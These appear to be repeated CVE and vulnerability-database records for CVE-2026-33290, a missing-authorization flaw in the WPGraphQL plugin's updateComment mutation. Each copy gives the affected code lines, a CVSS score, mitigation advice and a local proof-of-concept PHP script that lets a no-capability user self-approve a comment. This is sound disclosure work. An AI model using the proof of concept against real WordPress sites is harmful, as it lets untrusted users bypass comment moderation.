{"dataType": "CVE_RECORD", "dataVersion": "5.2", "cveMetadata": {"cveId": "CVE-2026-33290", "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "state": "PUBLISHED", "assignerShortName": "GitHub_M", "dateReserved": "2026-03-18T18:55:47.426Z", "datePublished": "2026-03-23T23:58:57.345Z", "dateUpdated": "2026-03-24T18:38:29.166Z"}, "containers": {"cna": {"title": "WPGraphQL Repo's updateComment allows low-privileged authenticated users to change comment moderation status (comment_approved) without moderate_comments permission", "problemTypes": [{"descriptions": [{"cweId": "CWE-862", "lang": "en", "description": "CWE-862: Missing Authorization", "type": "CWE"}]}], "metrics": [{"cvssV3_1": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1"}}], "references": [{"name": "https://github.com/wp-graphql/wp-graphql/security/advisories/GHSA-9hc3-mh5h-4fgh", "tags": ["x_refsource_CONFIRM"], "url": "https://github.com/wp-graphql/wp-graphql/security/advisories/GHSA-9hc3-mh5h-4fgh"}, {"name": "https://github.com/wp-graphql/wp-graphql/releases/tag/wp-graphql%2Fv2.10.0", "tags": ["x_refsource_MISC"], "url": "https://github.com/wp-graphql/wp-graphql/releases/tag/wp-graphql%2Fv2.10.0"}], "affected": [{"vendor": "wp-graphql", "product": "wp-graphql", "versions": [{"version": "< 2.10.0", "status": "affected"}]}], "providerMetadata": {"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M", "dateUpdated": "2026-03-23T23:58:57.345Z"}, "descriptions": [{"lang": "en", "value": "WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch.\n\n### Details\n\nIn WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based:\n\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability.\n- plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment.\n- plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH).\n\nThis means a non-moderator owner can submit status during update and transition moderation state.\n\n### PoC\n\nTested in local wp-env (Docker) with WPGraphQL 2.9.1.\n\n1. Start environment:\n\n npm install\n npm run wp-env start\n\n2. Run this PoC:\n\n```\n npm run wp-env run cli -- wp eval '\n add_role(\"no_caps\",\"No Caps\",[]);\n $user_id = username_exists(\"poc_nocaps\");\n if ( ! $user_id ) {\n $user_id = wp_create_user(\"poc_nocaps\",\"Passw0rd!\",\"poc_nocaps@example.com\");\n }\n $user = get_user_by(\"id\",$user_id);\n $user->set_role(\"no_caps\");\n\n $post_id = wp_insert_post([\n \"post_title\" => \"PoC post\",\n \"post_status\" => \"publish\",\n \"post_type\" => \"post\",\n \"comment_status\" => \"open\",\n ]);\n\n $comment_id = wp_insert_comment([\n \"comment_post_ID\" => $post_id,\n \"comment_content\" => \"pending comment\",\n \"user_id\" => $user_id,\n \"comment_author\" => $user->display_name,\n \"comment_author_email\" => $user->user_email,\n \"comment_approved\" => \"0\",\n ]);\n\n wp_set_current_user($user_id);\n\n $result = graphql([\n \"query\" => \"mutation U(\\$id:ID!){ updateComment(input:{id:\\$id,status:APPROVE}){ success comment{ databaseId status } } }\",\n \"variables\" => [ \"id\" => (string)$comment_id ],\n ]);\n\n echo wp_json_encode([\n \"role_caps\" => array_keys(array_filter((array)$user->allcaps)),\n \"status\" => $result[\"data\"][\"updateComment\"][\"comment\"][\"status\"] ?? null,\n \"db_comment_approved\" => get_comment($comment_id)->comment_approved ?? null,\n \"comment_id\" => $comment_id\n ]);\n '\n```\n\n3. Observe result:\n\n- role_caps is empty (or no moderate_comments)\n- mutation returns status: APPROVE\n- DB value becomes comment_approved = 1\n\n### Impact\n\nThis is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content."}], "source": {"advisory": "GHSA-9hc3-mh5h-4fgh", "discovery": "UNKNOWN"}}, "adp": [{"metrics": [{"other": {"type": "ssvc", "content": {"timestamp": "2026-03-24T18:38:22.291114Z", "id": "CVE-2026-33290", "options": [{"Exploitation": "poc"}, {"Automatable": "no"}, {"Technical Impact": "partial"}], "role": "CISA Coordinator", "version": "2.0.3"}}}], "title": "CISA ADP Vulnrichment", "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2026-03-24T18:38:29.166Z"}}]}}

{"dataType": "CVE_RECORD", "containers": {"adp": [{"title": "CISA ADP Vulnrichment", "metrics": [{"other": {"type": "ssvc", "content": {"id": "CVE-2026-33290", "role": "CISA Coordinator", "options": [{"Exploitation": "poc"}, {"Automatable": "no"}, {"Technical Impact": "partial"}], "version": "2.0.3", "timestamp": "2026-03-24T18:38:22.291114Z"}}}], "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2026-03-24T18:38:26.301Z"}}], "cna": {"title": "WPGraphQL Repo's updateComment allows low-privileged authenticated users to change comment moderation status (comment_approved) without moderate_comments permission", "source": {"advisory": "GHSA-9hc3-mh5h-4fgh", "discovery": "UNKNOWN"}, "metrics": [{"cvssV3_1": {"scope": "UNCHANGED", "version": "3.1", "baseScore": 4.3, "attackVector": "NETWORK", "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "integrityImpact": "LOW", "userInteraction": "NONE", "attackComplexity": "LOW", "availabilityImpact": "NONE", "privilegesRequired": "LOW", "confidentialityImpact": "NONE"}}], "affected": [{"vendor": "wp-graphql", "product": "wp-graphql", "versions": [{"status": "affected", "version": "< 2.10.0"}]}], "references": [{"url": "https://github.com/wp-graphql/wp-graphql/security/advisories/GHSA-9hc3-mh5h-4fgh", "name": "https://github.com/wp-graphql/wp-graphql/security/advisories/GHSA-9hc3-mh5h-4fgh", "tags": ["x_refsource_CONFIRM"]}, {"url": "https://github.com/wp-graphql/wp-graphql/releases/tag/wp-graphql%2Fv2.10.0", "name": "https://github.com/wp-graphql/wp-graphql/releases/tag/wp-graphql%2Fv2.10.0", "tags": ["x_refsource_MISC"]}], "descriptions": [{"lang": "en", "value": "WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch.\n\n### Details\n\nIn WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based:\n\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability.\n- plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment.\n- plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH).\n\nThis means a non-moderator owner can submit status during update and transition moderation state.\n\n### PoC\n\nTested in local wp-env (Docker) with WPGraphQL 2.9.1.\n\n1. Start environment:\n\n npm install\n npm run wp-env start\n\n2. Run this PoC:\n\n```\n npm run wp-env run cli -- wp eval '\n add_role(\"no_caps\",\"No Caps\",[]);\n $user_id = username_exists(\"poc_nocaps\");\n if ( ! $user_id ) {\n $user_id = wp_create_user(\"poc_nocaps\",\"Passw0rd!\",\"poc_nocaps@example.com\");\n }\n $user = get_user_by(\"id\",$user_id);\n $user->set_role(\"no_caps\");\n\n $post_id = wp_insert_post([\n \"post_title\" => \"PoC post\",\n \"post_status\" => \"publish\",\n \"post_type\" => \"post\",\n \"comment_status\" => \"open\",\n ]);\n\n $comment_id = wp_insert_comment([\n \"comment_post_ID\" => $post_id,\n \"comment_content\" => \"pending comment\",\n \"user_id\" => $user_id,\n \"comment_author\" => $user->display_name,\n \"comment_author_email\" => $user->user_email,\n \"comment_approved\" => \"0\",\n ]);\n\n wp_set_current_user($user_id);\n\n $result = graphql([\n \"query\" => \"mutation U(\\$id:ID!){ updateComment(input:{id:\\$id,status:APPROVE}){ success comment{ databaseId status } } }\",\n \"variables\" => [ \"id\" => (string)$comment_id ],\n ]);\n\n echo wp_json_encode([\n \"role_caps\" => array_keys(array_filter((array)$user->allcaps)),\n \"status\" => $result[\"data\"][\"updateComment\"][\"comment\"][\"status\"] ?? null,\n \"db_comment_approved\" => get_comment($comment_id)->comment_approved ?? null,\n \"comment_id\" => $comment_id\n ]);\n '\n```\n\n3. Observe result:\n\n- role_caps is empty (or no moderate_comments)\n- mutation returns status: APPROVE\n- DB value becomes comment_approved = 1\n\n### Impact\n\nThis is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content."}], "problemTypes": [{"descriptions": [{"lang": "en", "type": "CWE", "cweId": "CWE-862", "description": "CWE-862: Missing Authorization"}]}], "providerMetadata": {"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M", "dateUpdated": "2026-03-23T23:58:57.345Z"}}}, "cveMetadata": {"cveId": "CVE-2026-33290", "state": "PUBLISHED", "dateUpdated": "2026-03-24T18:38:29.166Z", "dateReserved": "2026-03-18T18:55:47.426Z", "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "datePublished": "2026-03-23T23:58:57.345Z", "assignerShortName": "GitHub_M"}, "dataVersion": "5.2"}

{"cveTags": [], "descriptions": [{"lang": "en", "value": "WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch.\n\n### Details\n\nIn WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based:\n\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability.\n- plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment.\n- plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH).\n\nThis means a non-moderator owner can submit status during update and transition moderation state.\n\n### PoC\n\nTested in local wp-env (Docker) with WPGraphQL 2.9.1.\n\n1. Start environment:\n\n npm install\n npm run wp-env start\n\n2. Run this PoC:\n\n```\n npm run wp-env run cli -- wp eval '\n add_role(\"no_caps\",\"No Caps\",[]);\n $user_id = username_exists(\"poc_nocaps\");\n if ( ! $user_id ) {\n $user_id = wp_create_user(\"poc_nocaps\",\"Passw0rd!\",\"poc_nocaps@example.com\");\n }\n $user = get_user_by(\"id\",$user_id);\n $user->set_role(\"no_caps\");\n\n $post_id = wp_insert_post([\n \"post_title\" => \"PoC post\",\n \"post_status\" => \"publish\",\n \"post_type\" => \"post\",\n \"comment_status\" => \"open\",\n ]);\n\n $comment_id = wp_insert_comment([\n \"comment_post_ID\" => $post_id,\n \"comment_content\" => \"pending comment\",\n \"user_id\" => $user_id,\n \"comment_author\" => $user->display_name,\n \"comment_author_email\" => $user->user_email,\n \"comment_approved\" => \"0\",\n ]);\n\n wp_set_current_user($user_id);\n\n $result = graphql([\n \"query\" => \"mutation U(\\$id:ID!){ updateComment(input:{id:\\$id,status:APPROVE}){ success comment{ databaseId status } } }\",\n \"variables\" => [ \"id\" => (string)$comment_id ],\n ]);\n\n echo wp_json_encode([\n \"role_caps\" => array_keys(array_filter((array)$user->allcaps)),\n \"status\" => $result[\"data\"][\"updateComment\"][\"comment\"][\"status\"] ?? null,\n \"db_comment_approved\" => get_comment($comment_id)->comment_approved ?? null,\n \"comment_id\" => $comment_id\n ]);\n '\n```\n\n3. Observe result:\n\n- role_caps is empty (or no moderate_comments)\n- mutation returns status: APPROVE\n- DB value becomes comment_approved = 1\n\n### Impact\n\nThis is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content."}, {"lang": "es", "value": "WPGraphQL proporciona una API GraphQL para sitios de WordPress. Antes de la versi\u00f3n 2.10.0, una falla de autorizaci\u00f3n en updateComment permite a un usuario autenticado con bajos privilegios (incluyendo un rol personalizado con cero capacidades) cambiar el estado de moderaci\u00f3n de su propio comentario (por ejemplo, a APROBAR) sin la capacidad moderate_comments. Esto puede eludir los flujos de trabajo de moderaci\u00f3n y permitir que usuarios no confiables autoaprueben contenido. La versi\u00f3n 2.10.0 contiene un parche.\n\n### Detalles\n\nEn WPGraphQL 2.9.1 (probado), la autorizaci\u00f3n para updateComment se basa en el propietario, no en el campo:\n\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 permite a los moderadores.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 tambi\u00e9n permite al propietario del comentario, incluso si carece de la capacidad de moderaci\u00f3n.\n- plugins/wp-graphql/src/Data/CommentMutation.php:94:94 mapea el estado de entrada de GraphQL directamente a comment_approved de WordPress.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persiste ese valor a trav\u00e9s de wp_update_comment.\n- plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 expone los estados de moderaci\u00f3n (APROBAR, EN ESPERA, CORREO NO DESEADO, PAPELERA).\n\nEsto significa que un propietario no moderador puede enviar el estado durante la actualizaci\u00f3n y hacer la transici\u00f3n del estado de moderaci\u00f3n.\n\n### PoC\n\nProbado en wp-env local (Docker) con WPGraphQL 2.9.1.\n\n1. Iniciar entorno:\n\n npm install\n npm run wp-env start\n\n2. Ejecutar este PoC:\n\n```\n npm run wp-env run cli -- wp eval '\n add_role(\"no_caps\",\"No Caps\",[]);\n $user_id = username_exists(\"poc_nocaps\");\n if ( ! $user_id ) {\n $user_id = wp_create_user(\"poc_nocaps\",\"Passw0rd!\",\"poc_nocaps@example.com\");\n }\n $user = get_user_by(\"id\",$user_id);\n $user-&gt;set_role(\"no_caps\");\n\n $post_id = wp_insert_post([\n \"post_title\" =&gt; \"PoC post\",\n \"post_status\" =&gt; \"publish\",\n \"post_type\" =&gt; \"post\",\n \"comment_status\" =&gt; \"open\",\n ]);\n\n $comment_id = wp_insert_comment([\n \"comment_post_ID\" =&gt; $post_id,\n \"comment_content\" =&gt; \"pending comment\",\n \"user_id\" =&gt; $user_id,\n \"comment_author\" =&gt; $user-&gt;display_name,\n \"comment_author_email\" =&gt; $user-&gt;user_email,\n \"comment_approved\" =&gt; \"0\",\n ]);\n\n wp_set_current_user($user_id);\n\n $result = graphql([\n \"query\" =&gt; \"mutation U(\\$id:ID!){ updateComment(input:{id:\\$id,status:APPROVE}){ success comment{ databaseId status } } }\",\n \"variables\" =&gt; [ \"id\" =&gt; (string)$comment_id ],\n ]);\n\n echo wp_json_encode([\n \"role_caps\" =&gt; array_keys(array_filter((array)$user-&gt;allcaps)),\n \"status\" =&gt; $result[\"data\"][\"updateComment\"][\"comment\"][\"status\"] ?? null,\n \"db_comment_approved\" =&gt; get_comment($comment_id)-&gt;comment_approved ?? null,\n \"comment_id\" =&gt; $comment_id\n ]);\n '\n```\n\n3. Observar resultado:\n\n- role_caps est\u00e1 vac\u00edo (o no tiene moderate_comments)\n- la mutaci\u00f3n devuelve status: APROBAR\n- el valor de la base de datos se convierte en comment_approved = 1\n\n### Impacto\n\nEsto es un bypass de autorizaci\u00f3n / un problema de control de acceso roto en las transiciones de estado de moderaci\u00f3n de comentarios. Cualquier despliegue que utilice mutaciones de comentarios de WPGraphQL donde los usuarios con bajos privilegios puedan hacer comentarios est\u00e1 impactado. La pol\u00edtica de moderaci\u00f3n puede ser eludida autoaprobando contenido."}], "id": "CVE-2026-33290", "lastModified": "2026-04-16T14:46:24.290", "metrics": {"cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary"}]}, "published": "2026-03-24T01:17:01.677", "references": [{"source": "security-advisories@github.com", "url": "https://github.com/wp-graphql/wp-graphql/releases/tag/wp-graphql%2Fv2.10.0"}, {"source": "security-advisories@github.com", "url": "https://github.com/wp-graphql/wp-graphql/security/advisories/GHSA-9hc3-mh5h-4fgh"}], "sourceIdentifier": "security-advisories@github.com", "vulnStatus": "Deferred", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-862"}], "source": "security-advisories@github.com", "type": "Primary"}]}

{}

{"affected": [{"configurations": [{"platform": null, "status": "unaffected", "versions": null}], "enrichment": {"confidence": 80.0, "confidence_source": "inferred", "scores": [{"score": 80.0, "source": "inferred"}, {"score": 100.0, "source": "matching"}]}, "product": "wordpress", "vendor": "wordpress"}, {"configurations": [{"platform": null, "status": "affected", "versions": {"scheme": "semver", "value": "[0,2.10.0)"}}], "enrichment": {"confidence": 95.0, "confidence_source": "matching", "scores": [{"score": 95.0, "source": "matching"}]}, "original": {"product": "wp-graphql", "source": "cna", "vendor": "wp-graphql"}, "product": "wpgraphql", "vendor": "wpgraphql"}], "analysis": {"en": {"generated_at": "2026-03-24T03:37:36.678483+00:00", "value": {"mitigation_remediation": ["Upgrade WPGraphQL to version 2.10.0 or later.", "If immediate upgrade is not possible, restrict access to the updateComment mutation to roles that possess the moderate_comments capability or disable the mutation entirely.", "Verify that comment moderation workflows are functioning correctly after applying the patch or restrictions."], "summary": {"action": "Apply Patch", "impact": "Unauthorized Comment Approval"}, "threat_synthesis": {"affected_systems": "WordPress sites running the WPGraphQL plugin prior to version 2.10.0, such as 2.9.1, are affected. The issue is triggered through the GraphQL API whenever an authenticated user submits an updateComment mutation for a comment they own.", "description_and_impact": "This vulnerability arises from an authorization flaw in the updateComment mutation of WPGraphQL. Low\u2011privileged authenticated users can modify the moderation status of their own comments, bypassing the moderate_comments capability. Consequently, untrusted users can self\u2011approve comments, circumventing the site\u2019s moderation workflow and potentially exposing the site to unwanted or malicious content.", "risk_and_exploitability": "The vulnerability carries a CVSS score of 4.3, indicating moderate severity, and it requires only an authenticated user with comment posting rights to exploit it. No public exploits are listed in the KEV catalog, but the lack of a moderate_comments check means an attacker who can author a comment can elevate its status without further privileges. The attack vector is through the GraphQL updateComment mutation, and successful exploitation could undermine content moderation policies."}}}}, "created": "2026-03-24T10:29:40.752874+00:00", "updated": "2026-03-25T20:40:53.284130+00:00", "vendors": ["wordpress", "wordpress$PRODUCT$wordpress", "wpgraphql", "wpgraphql$PRODUCT$wpgraphql"]}